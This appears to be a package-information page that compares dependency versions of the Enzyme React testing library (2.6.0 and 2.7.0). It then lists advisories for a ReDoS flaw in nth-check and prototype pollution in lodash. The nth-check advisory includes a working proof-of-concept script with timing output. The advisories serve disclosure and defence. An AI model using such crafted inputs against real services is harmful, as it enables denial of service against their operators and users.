Enzyme version 2.7.0 represents a notable update to Airbnb's popular JavaScript testing utility for React, building upon the foundation laid by version 2.6.0. Both versions provide tools for easily asserting, manipulating, and traversing React components' output, streamlining the testing process. Key differences emerge in the dependency updates, particularly within the development environment. While both rely on core tools like Babel, ESLint, and Webpack for development and testing, version 2.7.0 incorporates newer versions of ESLint and its associated plugins. Specifically, eslint moves from ^3.9.1 to ^3.10.2, and eslint-plugin-react advances from ^6.6.0 to ^6.7.1.
These updates suggest improvements in linting rules and React-specific code analysis, potentially catching more subtle errors and promoting cleaner code. Furthermore, there is an update on the lodash dependency, where version 2.6.0 uses ^4.16.4 and version 2.7.0 uses ^4.17.2. For developers, this means a slightly more polished and robust testing environment in 2.7.0, benefiting from the latest static analysis capabilities. The core functionality of interacting with React components remains consistent, allowing users to upgrade without significant code changes, while taking advantage of enhanced development tools. Both versions maintain the same peer dependency requirements for React, indicating compatibility with a wide range of React versions.
All the vulnerabilities related to the version 2.7.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.